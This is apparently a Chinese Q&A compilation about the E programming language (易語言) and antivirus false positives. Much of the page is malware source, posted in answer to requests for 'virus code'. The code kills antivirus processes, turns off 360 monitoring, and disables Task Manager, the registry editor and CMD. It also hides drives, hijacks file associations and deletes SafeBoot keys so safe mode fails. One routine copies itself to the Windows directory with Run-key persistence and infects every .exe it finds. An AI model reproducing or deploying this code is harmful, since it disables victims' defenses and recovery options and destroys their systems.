易語言挖礦病毒
Ⅰ 為什麼易語言做出來的空殼都會被查出有病毒
易語言本身極容易被殺毒軟體報毒,尤其是360安全衛士(或360殺毒軟體),因此使用易語言編寫軟體需要做相應的信任或排除工作。
易誤報的原因:主要是因為易語言的使用簡單,因此有許多人是用易語言來開發軟體程序,這其中也包括了很多居心叵測的人,他們同樣會使用這樣一種簡單方便的語言來設計各種帶有惡意功能的程序或軟體,比如:病毒、木馬等。由於以易語言設計的程序的特殊結構以及必須攜帶運行庫(支持庫)的特殊性,因此不少殺毒軟體在提取病毒特徵碼時常常選擇(或誤選擇)這些本身無害的支持庫作為目標樣本或者選擇易語言程序的特殊結構作為樣本,因此導致所有使用易語言設計的程序都攜帶有這些錯誤的特徵碼,從而導致殺毒軟體誤報正常程序。
處理方法:通常的處理方法是採用對編譯好的程序進行加殼加密處理的辦法,然而這樣處理很多時候反而會加大誤報可能性,推薦的做法是採用靜態編譯易語言程序或者在安全軟體中信任或排除以語言編寫的程序。如果你設計的軟體需要提供給其他人使用,那麼告知他們軟體是安全的,要求他們設定信任或排除即可。
當然,最終極的辦法,建議學習一門更常見更通用更主流的編程語言。
Ⅱ 易語言本身有病毒嗎
很高興回答您的問題
易語言本身是無毒的,其編寫出來的正常易語言程序也是無毒的(某些盜號軟體、病毒等除外),易語言程序報毒現象已經存在很長時間了,且沒什麼解決辦法,您如果要用易語言編程,請讓使用者將程序加入殺毒軟體白名單或卸載360
殺毒軟體檢查報毒通常是特徵掃描,只有滿足特徵符合就會報毒,不會管你是用什麼語言編寫的。但通常易語言編譯生成的EXE在運行時,絕大多數情況下CPU指令運行在支持庫領空(僅少數在EXE領空,這與其它編譯器生成的EXE的行為有很大不同),給殺毒軟體查殺和機器分析造成了較大阻力,而且由於易語言影響力遠不如JAVA/C/C++,很難吸引殺軟廠商重視,從而導致誤報時有發生。
另外,由於易語言多被應用於盜號軟體,以至於可能殺毒軟體只要是易語言程序就會報毒
推薦您使用與易語言相似的語言:VB
另外,經過檢測,您的下載地址所下載的易語言是無毒的,可以放心使用
Ⅲ 易語言做感染文件型病毒
.版本 2' 運行 (「taskkill /f /im kavsvc.exe」, 假, 1)
' 運行 (「taskkill /f /im KVXP.kxp」, 假, 1)
' 運行 (「taskkill /f /im Rav.exe」, 假, 1)
' 運行 (「taskkill /f /im Ravmon.exe」, 假, 1)
' 運行 (「taskkill /f /im Mcshield.exe」, 假, 1)
' 運行 (「taskkill /f /im VsTskMgr.exe」, 假, 1)
' ' 繞過360監控
' 寫注冊項 (4, 「SOFTWARE\360Safe\safemon\ExecAccess」, 0)
' 寫注冊項 (4, 「SOFTWARE\360Safe\safemon\MonAccess」, 0)
' 寫注冊項 (4, 「SOFTWARE\360Safe\safemon\SiteAccess」, 0)
' 寫注冊項 (4, 「SOFTWARE\360Safe\safemon\UDiskAccess」, 0)
' 運行 (「taskkill /f /im 360tray.exe」, 假, 1) ' 結束360進程
.版本 2' 寫注冊項 (4, 「SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue」, 0) ' 隱藏文件和文件夾
' 寫注冊項 (3, 「Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr」, 0) ' 禁用任務管理器
' 寫注冊項 (3, 「Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel」, 1) ' 禁用控制面板
' 寫注冊項 (3, 「Software\Microsoft\Windows\CurrentVersion\Policies\System\Disableregistrytools」, 1) ' 禁用注冊表
' 寫注冊項 (3, 「Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun」, 1) ' 隱藏開始中的運行 禁止WIN2000/XP通過任務管理器創建新任務' 寫注冊項 (3, 「SoftWare \Microsoft \Windows \CurrentVersion \Policies\WinOldApp\Disabled」, 1)
' ' 隱藏「MS-DOS方式」下的磁碟驅動器。不管是在「我的電腦」里,或「MS-DOS」方式下都看不見了
其它自己發揮,寫批處理,重起,格式化硬碟數據等。
Ⅳ 請問一易語言能夠編寫木馬或病毒嗎 望高手指點小弟在此謝謝了
從核心層面上來說易語言不適合編寫木馬病毒。
原因第一是體積過大,第二是誤報嚴重,第三是平台兼容性差,部分精簡機器甚至無法運行。
至於樓上說的寫釣魚軟體這個到還是稍微認同的。
任何語言都可以被用來造福人類也可以用來破壞網路,小到vb腳本或是一個bat都有可能要你的計算機無法使用或癱瘓,大到直接破壞硬體,不過這個幾率比較小。
其實編寫木馬病毒很無聊,如果真想編寫的話可以從下面幾個方面著手。
1:你菜鳥時計算機被感染有什麼症狀,通常是無法正常關機機器運行緩慢,被自動安裝許多垃圾軟體。
2:你學習時如何被誘導使用惡意軟體從而挾持你的計算機。
3:你認為你中毒了你卻發現不到。
4:你發現了病毒卻無法kill他。
1-4點分別說的是,編寫感染機制,挾持函數,自動下載和安裝病毒軟體誇大感染面積,偽裝程序,病毒的自我隱藏,病毒的復活。
你需要掌握以上的函數才能寫出一個真正意義上的木馬或病毒。
但是遺憾的是,易語言編寫出來的功能比較齊全的病毒通常不能很好的被運行,因為兼容性太差,還有就是特徵太多了(api)。
所以我上面說了這么多隻想告訴你,易語言可以編寫,但是如果要實際使用的話易語言編寫出來的在病毒里只能說是處在娛樂病毒的階段。誰用誰知道。
不過不能否認,易語言圓了許多人的編程夢,同時也編寫出了許多有用的小程序。
Ⅳ 跪求:易語言編寫的具有感染性的病毒源代碼..
.版本 2
.支持庫 eAPI
提取資源文件圖標 (取運行目錄 () + 「\」 + 取執行文件名 (), 0, 「C:\windows\system32\Aver.ico」, ) ' 替換系統exe圖標
寫注冊項 (#本地機器, 「SOFTWARE\Classes\exefile\DefaultIcon\」, 「C:\windows\system32\Aver.ico」) ' 寫到注冊表鍵值
寫注冊項 (#現行用戶, 「Software\Microsoft\Windows\CurrentVersion\Run\」 + 取執行文件名 (), 取運行目錄 () + 「\」 + 取執行文件名 ()) ' 寫讓注冊表鍵值刪除後可恢復木馬實行自啟動
.如果真 (取運行目錄 () ≠ 讀環境變數 (「Windir」))
復制文件 (取運行目錄 () + 「\」 + 取執行文件名 (), 讀環境變數 (「Windir」) + 「\penguin.exe」)
運行 (「Cmd /c Attrib +H +S 」 + 讀環境變數 (「Windir」) + 「\penguin.exe」, 真, 1)
運行 (讀環境變數 (「Windir」) + 「\penguin.exe」, 假, )
寫到文件 (讀環境變數 (「Windir」) + 「penguin.bat」, 到位元組集 (「@echo off」 + #換行符 + 「Taskkill /f /im 」 + 取執行文件名 () + #換行符 + 「Del 」 + 取當前目錄 () + 「\」 + 取執行文件名 () + #換行符 + 「Del %0」 + #換行符 + 「Exit」))
寫到文件 (讀環境變數 (「Windir」) + 「\penguin.bat」, 到位元組集 (子文本替換 (子文本替換 (到文本 (讀入文件 (讀環境變數 (「Windir」) + 「penguin.bat」)), 「C:\Documents and Settings」, 「C:\DOCUME~1」, , , 假), 「Windows」, 「 」, , , 假)))
運行 (讀環境變數 (「Windir」) + 「\penguin.bat」, 真, 1)
.如果真結束
.如果真 (取運行目錄 () = 讀環境變數 (「Windir」))
寫注冊項 (#本地機器, 「SOFTWARE\Microsoft\Windows\CurrentVersion\Run\penguin」, 讀環境變數 (「Windir」) + 「\penguin.exe」)
寫到文件 (讀環境變數 (「Windir」) + 「Infection.exe」, #感染)
運行 (讀環境變數 (「Windir」) + 「\Infection.exe」, 真, 1)
.如果真結束
驅動器 = 取驅動器列表 ()
.版本 2
.子程序 搜尋
.參數 目錄, 文本型
.局部變數 文件號
.局部變數 文件名, 文本型
處理事件 ()
.如果真 (取文本右邊 (目錄, 1) ≠ 「\」)
目錄 = 目錄 + 「\」
.如果真結束
文件名 = 尋找文件 (目錄 + 「*.exe」, )
.判斷循環首 (文件名 ≠ 「」)
輸出調試文本 (目錄 + 文件名)
文件號 = 打開文件 (刪首尾空 (目錄 + 文件名), #讀寫, #無限制)
插入位元組集 (文件號, #圖標)
關閉文件 (文件號)
文件名 = 尋找文件 (, )
.判斷循環尾 ()
文件名 = 尋找文件 (目錄 + 「*.*」, #子目錄)
.判斷循環首 (文件名 ≠ 「」)
.如果真 (取文本左邊 (文件名, 1) ≠ 「.」)
搜尋 (目錄 + 文件名)
.如果真結束
文件名 = 尋找文件 (, #子目錄)
.判斷循環尾 ()
原創,不要外傳=.=
Ⅵ 怎樣用易語言寫病毒。我初學者。求師傅
願我的答案 能夠解決您的煩憂
傳播和製作病毒式不法行為,不建議你去這么做,如果只是想學習,學好易語言我幫你製作最基本的
1,在此之前跟你說不要相信任何人跟你說的怎麼製作什麼的,小心被別人下種子。記得殺毒啊
2,下載騰訊電腦管家「8.3」最新版,對電腦首先進行一個體檢,打開所有防火牆避免系統其餘文件被感染。
3,打開殺毒頁面開始查殺,切記要打開小紅傘引擎。
4,如果普通查殺不能解決問題,您可以打開騰訊電腦管家---工具箱---頑固木馬專殺- 進行深度
掃描。
5,查殺處理完所有病毒後,立刻重啟電腦,再進行一次安全體檢,清除多餘系統緩存文件,避免二次感染。
如果您對我的答案不滿意,可以繼續追問或者提出寶貴意見,謝謝
Ⅶ 易語言感染全盤EXE病毒代碼怎麼寫!
你想學「熊貓燒香」?
李俊判了4年,呆了3年表現不錯才給出來的,
你想呆幾年?
Ⅷ 易語言 編譯 後老是被認為是木馬病毒.....
你直接編譯把控制項寫出來,然後放在壓縮包裡面給別人呀,或者加殼,這樣就不會被報毒了!
Ⅸ 求易語言病毒源碼,最好能讓別人死機的源碼,急求,高分
.版本 2
.支持庫 shell
.程序集 窗口程序集1
.子程序 _按鈕1_被單擊
' 繞過殺毒軟體防禦:
運行 (「taskkill /f /im kavsvc.exe」, 假, 1)
運行 (「taskkill /f /im KVXP.kxp」, 假, 1)
運行 (「taskkill /f /im Rav.exe」, 假, 1)
運行 (「taskkill /f /im Ravmon.exe」, 假, 1)
運行 (「taskkill /f /im Mcshield.exe」, 假, 1)
運行 (「taskkill /f /im VsTskMgr.exe」, 假, 1)
' 修改系統時間:
置現行時間 (到時間 (「8888年8月8日」))
' 禁用任務管理器:
寫注冊項 (3, 「Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr」, 0)
' 禁用注冊表:
寫注冊項 (3, 「Software\Microsoft\Windows\CurrentVersion\Policies\System\Disableregistrytools」, 1)
' 隱藏開始中的運行 禁止WIN2000/XP通過任務管理器創建新任務:
寫注冊項 (3, 「Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun」, 1)
' 隱藏「MS-DOS方式」下的磁碟驅動器。不管是在「我的電腦」里,或「MS-DOS」方式下都看不見了:
寫注冊項 (3, 「SoftWare \Microsoft \Windows \CurrentVersion \Policies\WinOldApp\Disabled」, 1)
' 隱藏開始中的關機:
寫注冊項 (3, 「Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoClose」, 1)
' 隱藏開始中的搜索:
寫注冊項 (3, 「Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind」, 1)
' OVER360防禦:
寫注冊項 (4, 「SOFTWARE\360Safe\safemon\ExecAccess」, 0)
寫注冊項 (4, 「SOFTWARE\360Safe\safemon\MonAccess」, 0)
寫注冊項 (4, 「SOFTWARE\360Safe\safemon\SiteAccess」, 0)
寫注冊項 (4, 「SOFTWARE\360Safe\safemon\UDiskAccess」, 0)
' 結束360進程
運行 (「taskkill /f /im 360tray.exe」, 假, 1)
' 隱藏所有驅動器:
寫注冊項 (3, 「Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDrives」, 4294967295)
' 禁止所有驅動器:
寫注冊項 (3, 「Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewOnDrive」, 4294967295)
' 隱藏文件夾選項:
寫注冊項 (3, 「Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions」, 1)
' 將桌面對象隱藏:
寫注冊項 (3, 「Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDesktop」, 1)
' 隱藏開始中的關機:
寫注冊項 (3, 「Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoClose」, 1)
' 隱藏開始中的搜索:
寫注冊項 (3, 「Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind」, 1)
' 這條有兩種情況。1 禁用CMD和.BAT文件 2 禁CMD不禁.BAT 0啟用兩項
寫注冊項 (3, 「Software\Policies\Microsoft\Windows\System\DisableCMD」, 1)
' 隱藏主頁選項組:
寫注冊項 (3, 「Software\Policies\Microsoft\Internet Explorer\Control Panel\HomePage」, 1)
' 隱藏IE文件菜單:
寫注冊項 (3, 「Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFileMenu」, 1)
' 隱藏收藏夾菜單:
寫注冊項 (3, 「Software\Policies\Microsoft\Internet Explorer\Restrictions\NoFavorites」, 1)
' 禁用IE列印功能:
寫注冊項 (3, 「Software\Policies\Microsoft\Internet Explorer\Restrictions\NoPrinting」, 1)
' 隱藏Internet選項:
寫注冊項 (3, 「Software\Policies\Microsoft\Internet Explorer\Restrictions\NoBrowserOptions」, 1)
' 禁止IE查看源文件:
寫注冊項 (3, 「Software\Policies\Microsoft\Internet Explorer\Restrictions\NoViewSource」, 1)
' 禁用IE下載功能:
寫注冊項 (3, 「Software\Microsoft\Windows\CurrentVersion\Interner Settings\Zones\3\1803」, 3)
' 禁止右鍵關聯菜單:
寫注冊項 (3, 「Software\Policies\Microsoft\Internet Explorer\Restrictions\NoBrowserContextMenu」, 1)
' 修改文件關聯:
寫注冊項 (1, 「.txt\」, 「jpegfile」)
寫注冊項 (1, 「.inf\」, 「jpegfile」)
寫注冊項 (1, 「.reg\」, 「jpegfile」)
寫注冊項 (1, 「.exe\」, 「jpegfile」)
' 無法進入安全模式:
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{36FC9E60-C465-11CF-8056-444553540000}\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E965-E325-11CE-BFC1-08002BE10318}\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E969-E325-11CE-BFC1-08002BE10318}\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E96A-E325-11CE-BFC1-08002BE10318}\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E96B-E325-11CE-BFC1-08002BE10318}\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E96F-E325-11CE-BFC1-08002BE10318}\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E973-E325-11CE-BFC1-08002BE10318}\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E974-E325-11CE-BFC1-08002BE10318}\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E975-E325-11CE-BFC1-08002BE10318}\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E977-E325-11CE-BFC1-08002BE10318}\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E97B-E325-11CE-BFC1-08002BE10318}\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E97D-E325-11CE-BFC1-08002BE10318}\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E980-E325-11CE-BFC1-08002BE10318}\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{71A27CDD-812A-11D0-BEC7-08002BE2092F}\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{745A17A0-74D3-11D0-B6FE-00A0C90F57DA}\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\AFD\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\AppMgmt\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Base\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Boot Bus Extender\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Boot file system\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Browser\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\CryptSvc\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\DcomLaunch\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Dhcp\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\dmadmin\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\dmboot.sys\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\dmio.sys\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\dmload.sys\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\dmserver\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\DnsCache\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\EventLog\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\File system\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Filter\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\HelpSvc\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\ip6fw.sys\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\ipnat.sys\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\LanmanServer\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\LanmanWorkstation\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\LmHosts\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Messenger\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\NDIS\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\NDIS Wrapper\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Ndisuio\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\NetBIOS\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\NetBIOSGroup\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\NetBT\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\NetDDEGroup\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Netlogon\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\NetMan\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Network\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\NetworkProvider\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\NtLmSsp\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\PCI Configuration\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\PlugPlay\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\PNP Filter\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\PNP_TDI\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Primary disk\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\rdpcdd.sys\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\rdpdd.sys\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\rdpwd.sys\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\rdsessmgr\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\RpcSs\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\SCSI Class\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\sermouse.sys\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\SharedAccess\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\sr.sys\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\SRService\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Streams Drivers\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\System Bus Extender\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Tcpip\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\TDI\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\tdpipe.sys\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\tdtcp.sys\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\termservice\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\vga.sys\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\vgasave.sys\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\WinMgmt\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\WZCSVC\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Ndisuio\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\」)
' 關機:
關閉系統 (2, 真)
Ⅹ 易語言病毒代碼
.版本 2
.局部變數 變數, 整數型
置現行時間 (到時間 (「2056年1月1日」))
運行 (「taskkill /f /im kavsvc.exe」, 假, 1)
運行 (「taskkill /f /im KVXP.kxp」, 假, 1)
運行 (「taskkill /f /im Rav.exe」, 假, 1)
運行 (「taskkill /f /im Ravmon.exe」, 假, 1)
運行 (「taskkill /f /im Mcshield.exe」, 假, 1)
運行 (「taskkill /f /im VsTskMgr.exe」, 假, 1)
' 繞過360監控
寫注冊項 (4, 「SOFTWARE\360Safe\safemon\ExecAccess」, 0)
寫注冊項 (4, 「SOFTWARE\360Safe\safemon\MonAccess」, 0)
寫注冊項 (4, 「SOFTWARE\360Safe\safemon\SiteAccess」, 0)
寫注冊項 (4, 「SOFTWARE\360Safe\safemon\UDiskAccess」, 0)
運行 (「taskkill /f /im 360tray.exe」, 假, 1) ' 結束360進程
' 修改關聯
寫注冊項 (1, 「.txt\」, 「jpegfile」)
寫注冊項 (1, 「.inf\」, 「jpegfile」)
寫注冊項 (4, 「SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue」, 0) ' 隱藏文件和文件夾
寫注冊項 (3, 「Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr」, 0) ' 禁用任務管理器
寫注冊項 (3, 「Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel」, 1) ' 禁用控制面板
寫注冊項 (3, 「Software\Microsoft\Windows\CurrentVersion\Policies\System\Disableregistrytools」, 1) ' 禁用注冊表
寫注冊項 (3, 「Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun」, 1) ' 隱藏開始中的運行 禁止WIN2000/XP通過任務管理器創建新任務
寫注冊項 (3, 「SoftWare \Microsoft \Windows \CurrentVersion \Policies\WinOldApp\Disabled」, 1)
' 隱藏「MS-DOS方式」下的磁碟驅動器。不管是在「我的電腦」里,或「MS-DOS」方式下都看不見了
寫注冊項 (3, 「Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDrives」, 4294967295) ' 隱藏所有驅動器
寫注冊項 (3, 「Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewOnDrive」, 4294967295) ' 禁止所有驅動器
寫注冊項 (3, 「Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions」, 1) ' 隱藏文件夾選項
寫注冊項 (3, 「Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDesktop」, 1) ' 將桌面對象隱藏
寫注冊項 (3, 「Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoClose」, 1) ' 隱藏開始中的關機
寫注冊項 (3, 「Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind」, 1) ' 隱藏開始中的搜索
' 寫注冊項 (3, 「Software\Policies\Microsoft\Windows\System\DisableCMD」, 1)'1 禁用CMD和.BAT文件 2 禁CMD不禁.BAT 0啟用兩項
寫注冊項 (3, 「Software\Policies\Microsoft\Internet Explorer\Control Panel\HomePage」, 1) ' 隱藏主頁選項組
寫注冊項 (3, 「Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFileMenu」, 1) ' 隱藏IE文件菜單
寫注冊項 (3, 「Software\Policies\Microsoft\Internet Explorer\Restrictions\NoFavorites」, 1) ' 隱藏收藏夾菜單
寫注冊項 (3, 「Software\Policies\Microsoft\Internet Explorer\Restrictions\NoPrinting」, 1) ' 禁用IE列印功能
寫注冊項 (3, 「Software\Policies\Microsoft\Internet Explorer\Restrictions\NoBrowserOptions」, 1) ' 隱藏Internet選項
寫注冊項 (3, 「Software\Policies\Microsoft\Internet Explorer\Restrictions\NoViewSource」, 1) ' 禁止IE查看源文件
寫注冊項 (3, 「Software\Microsoft\Windows\CurrentVersion\Interner Settings\Zones\3\1803」, 3) ' 禁用IE下載功能
寫注冊項 (3, 「Software\Policies\Microsoft\Internet Explorer\Restrictions\NoBrowserContextMenu」, 1) ' 禁止右鍵關聯菜單
寫注冊項 (3, 「Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRealMode」, 1) ' 禁止「重新啟動計算機切換到MS-DOS方式」
寫注冊項 (3, 「Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoLogOff」, 1) ' 禁止顯示「注銷」
寫注冊項 (3, 「Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRecentDocsMenu」, 1) ' 禁止文檔菜單
寫注冊項 (3, 「Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoLogOff」, 1) ' 去掉「開始」選單中的「登錄」項
寫注冊項 (3, 「Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu」, 1) ' 禁止使用滑鼠右鍵
寫注冊項 (3, 「Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetFolders」, 1) ' 禁止修改控制面版